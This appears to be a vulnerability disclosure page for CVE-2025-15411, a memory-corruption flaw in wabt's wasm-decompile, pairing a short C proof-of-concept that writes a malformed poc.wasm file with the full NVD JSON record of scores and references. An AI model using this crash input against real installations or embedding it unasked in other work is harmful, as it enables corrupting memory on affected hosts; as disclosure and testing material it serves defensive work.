CVE-2025-15411

/* CVE-2025-15411 PoC - WebAssembly wabt wasm-decompile memory corruption This PoC triggers memory corruption in wabt::AST::InsertNode function */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Minimal WebAssembly module header unsigned char poc_wasm[] = { 0x00, 0x61, 0x73, 0x6d, // Magic number (\0asm) 0x01, 0x00, 0x00, 0x00, // Version 1 // Type section 0x01, 0x07, 0x01, 0x60, 0x00, 0x01, 0x7f, // Function section 0x03, 0x02, 0x01, 0x00, // Export section 0x07, 0x09, 0x01, 0x06, 0x6d, 0x65, 0x6d, 0x6f, 0x72, 0x79, 0x00, 0x00, // Code section with malformed data 0x0a, 0x0a, 0x01, 0x08, 0x00, 0x41, 0x00, 0x0b, 0xff, 0xff, 0xff }; int main() { FILE *fp = fopen("poc.wasm", "wb"); if (fp) { fwrite(poc_wasm, 1, sizeof(poc_wasm), fp); fclose(fp); printf("PoC wasm file created: poc.wasm\n"); printf("Run: wasm-decompile poc.wasm\n"); } return 0; }

{"cve": {"id": "CVE-2025-15411", "sourceIdentifier": "[email protected]", "published": "2026-01-01T20:15:40.640", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in WebAssembly wabt up to 1.0.39. This vulnerability affects the function wabt::AST::InsertNode of the file /src/repro/wabt/bin/wasm-decompile of the component wasm-decompile. This manipulation causes memory corruption. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. Unfortunately, the project has no active maintainer at the moment. In a reply to the issue report somebody recommended to the researcher to provide a PR himself."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webassembly:wabt:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.39", "matchCriteriaId": "4553C1EF-0407-4632-ACA5-3D1E2A76FBDA"}]}]}], "references": [{"url": "https://github.com/WebAssembly/wabt/", "source": "[email protected]"}, {"url": "https://github.com/WebAssembly/wabt/issues/2679", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/oneafter/1208/blob/main/af1", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.339332", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339332", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.719825", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.736404", "source": "[email protected]"}]}}